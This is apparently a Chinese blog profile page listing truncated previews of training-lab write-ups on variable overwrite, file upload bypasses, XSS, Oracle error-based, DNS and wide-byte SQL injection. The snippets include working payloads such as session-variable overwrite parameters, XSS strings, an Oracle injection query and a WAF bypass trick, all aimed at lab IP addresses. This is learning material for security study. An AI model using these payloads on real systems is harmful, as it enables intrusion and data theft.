Track 实习学员

thieves

0关注
2粉丝
29文章
返回网站首页

您已发布 29篇文章作品写文章

Thieves 变量覆盖 结题笔记

http://120.203.13.75:8123/abc/upload首先登陆网页,打开登陆界面路径admin然后我们审计代码发现http://120.203.13.75:8123/abc/upload/interface/comment.php页面存在变量覆盖漏洞,构造语句_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_id]=1&amp

 2019-2-3
 0 
 47 

Thieves 文件上传大闯关 解题笔记

第一题 前端验证绕过使用burp抓包绕过foword上传成功第二题 Content-Type方式绕过首先生成一个图片马然后上传,使用burp抓包修改文件名 上传成功第三题 黑名单绕过过滤了php所以可以用php3,php4,php5,phtml来绕过将后缀改为phtml直接上传上传成功第四题 .htaccess文件绕过htaccess是分布式配置文件如果开启,可以是用

 2019-1-31
 0 
 34 

Thieves DOM XSS 解题笔记

首先打开靶场http://120.203.13.75:6815/3/然后发现与url相同,试试能不能插入xss首先查看元素,发现是<script>标签先闭合前面的标签,然后写入一个弹框120.203.13.75:6815/3/?</script><script>alert`thieves`</script>也可以使用unicode编码,因为docum

 2019-1-23
 0 
 23 

Thieves 存储型XSS 解题笔记

首先进入网页http://117.41.229.122:8082/发现cms和版本号,去百度一下发现大佬的文章,照着试一下首先让页面报错http://117.41.229.122:8082/index.php?c=main&m=test在最后加上xss语句<img src=a onerror=alert(1)>http://117.41.229.122:8082/index.p

 2019-1-18
 0 
 21 

Thieves 反射型XSS 解题笔记

首先打开网页http://117.41.229.122:8002/xss/index.php看见一个搜索框先插入123456测试发现两个输出点(注意查看源代码)首先输入<script>alert`123`</script>进行测试发现第一个输出点被转义了,并且在<h2>标签下,基本没辙而第二个没有被转义,但并没有弹窗发现语句在input标签的内部接着尝试使用&q

 2019-1-18
 0 
 17 

Thieves Oracle注入-报错注入 解题笔记

打开靶场,首先输入id=1 正常id=1' 报错id=1'-- 正常说明存在注入点输入?id=1' and 1 =ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))--查看数据库版本,发现是Oracle 11g找到了版本说明存着报错点,接下来就是显错注入了先查表?id=1'

 2019-1-17
 0 
 19 

Thieves DNS注入 解题笔记

首先进入网站120.203.13.75:8120/index3.php在后面输入id=1 and 1=1来传参发现网页设置有安全狗,在目标地址后面加上安全狗信任的文件格式,来绕过安全狗/1.txt?id=1 and 1=1由于盲注非常的麻烦,所以这里用到DNS注入注册一个ceyehttp://120.203.13.75:8120/index3.php/1.txt?id=1 and if((SELE

 2019-1-2
 0 
 18 

Thieves 宽字节注入 解题笔记

首先打开网页```http://120.203.13.75:8150/New/WidecharBased/RankOne/sql-one/```输入?id=1 and 1=1发现需要注释,于是输入```http://120.203.13.75:8150/New/WidecharBased/RankOne/sql-one/?id=1%27%20and%201=1%23```由于网页使用了addsla

 2018-12-30
 0 
 83